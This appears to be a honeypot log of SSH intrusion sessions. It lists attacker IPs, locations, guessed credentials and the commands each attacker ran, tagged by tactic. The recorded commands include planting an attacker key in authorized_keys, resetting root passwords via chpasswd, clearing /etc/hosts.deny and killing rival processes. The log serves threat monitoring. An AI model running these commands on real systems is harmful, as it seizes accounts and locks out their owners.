$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:og4b8UDWSw4t"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "123\nCBbZW9FH3jcp\nCBbZW9FH3jcp"|passwd|bash
$ Enter new UNIX password:
$ echo "123\nCBbZW9FH3jcp\nCBbZW9FH3jcp\n"|passwd
🎭 crumpet_root_5 (191.96.110.39) β€” London, United Kingdom Β· 1 session Β· 19 cmds
2026-05-13 15:34 EDT Β· as root/1337
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:Oj25cyuYCAAH"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_103 (181.233.152.49) β€” San Isidro, Peru Β· 2 sessions Β· 38 cmds
2026-05-05 04:15 EDT Β· as root/System123, root/odessa1
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:YSq9Qt5QMWfQ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:Itjo4M8erCtP"|chpasswd|bash
🎭 eagle_root_58 (31.58.87.216) β€” Fremont, United States Β· 1 session Β· 20 cmds
2026-05-13 15:25 EDT Β· as mine/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nLJQF10qZWEbC\nLJQF10qZWEbC"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nLJQF10qZWEbC\nLJQF10qZWEbC\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cowboy_root_55 (107.174.62.40) β€” Los Angeles, United States Β· 1 session Β· 19 cmds
2026-05-13 15:18 EDT Β· as root/odessa1
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:hGMXO2qX5W7C"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_115 (118.139.164.171) β€” Singapore, Singapore Β· 1 session Β· 19 cmds
2026-05-13 15:11 EDT Β· as root/manoj
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:8TeWozUBILQp"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_116 (45.119.84.196) β€” QuαΊ­n Mα»™t, Vietnam Β· 1 session Β· 19 cmds
2026-05-13 15:08 EDT Β· as root/Admin123$%
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:9Nci94fMjNiI"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_98 (89.46.101.122) β€” Bucharest, Romania Β· 1 session Β· 20 cmds
2026-05-13 14:56 EDT Β· as jenkins/jenkins321
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "jenkins321\nHXgPBhJ3mrku\nHXgPBhJ3mrku"|passwd|bash
$ Enter new UNIX password:
$ echo "jenkins321\nHXgPBhJ3mrku\nHXgPBhJ3mrku\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 steppe (109.172.47.129) β€” St Petersburg, Russia Β· 1 session Β· 20 cmds
2026-05-13 11:53 EDT Β· as alan/alan
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "alan\njrv9lmT2l3EN\njrv9lmT2l3EN"|passwd|bash
$ Enter new UNIX password:
$ echo "alan\njrv9lmT2l3EN\njrv9lmT2l3EN\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 panda_root_39 (36.103.243.179) β€” Suzhou, China Β· 1 session Β· 19 cmds
2026-05-13 11:43 EDT Β· as root/redis
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:2qR4v40P7weO"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_99 (43.157.213.31) β€” Jakarta, Indonesia Β· 2 sessions Β· 39 cmds
2026-05-07 01:23 EDT Β· as mapadmin/mapadmin123, root/Xu123456!
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:p7nFILszEUnQ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "mapadmin123\nUZ3Fn9WSkf3B\nUZ3Fn9WSkf3B"|passwd|bash
$ Enter new UNIX password:
$ echo "mapadmin123\nUZ3Fn9WSkf3B\nUZ3Fn9WSkf3B\n"|passwd
🎭 shadow_root_93 (181.28.101.14) β€” CaΓ±ada de GΓ³mez, Argentina Β· 1 session Β· 19 cmds
2026-05-13 11:23 EDT Β· as root/feifei
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:qT6wIUEPCRRh"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 kimchi_root_16 (221.161.235.168) β€” Busan, South Korea Β· 1 session Β· 19 cmds
2026-05-13 11:19 EDT Β· as root/Xu123456!
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:qSo2y1JloLzC"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_113 (117.121.214.50) β€” Buriram, Thailand Β· 1 session Β· 19 cmds
2026-05-13 11:16 EDT Β· as root/Xu123456!
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:LHzwVMPbJ2Dx"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 toucan_root_8 (177.133.169.9) β€” VitΓ³ria, Brazil Β· 1 session Β· 19 cmds
2026-05-13 11:15 EDT Β· as root/jefry
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
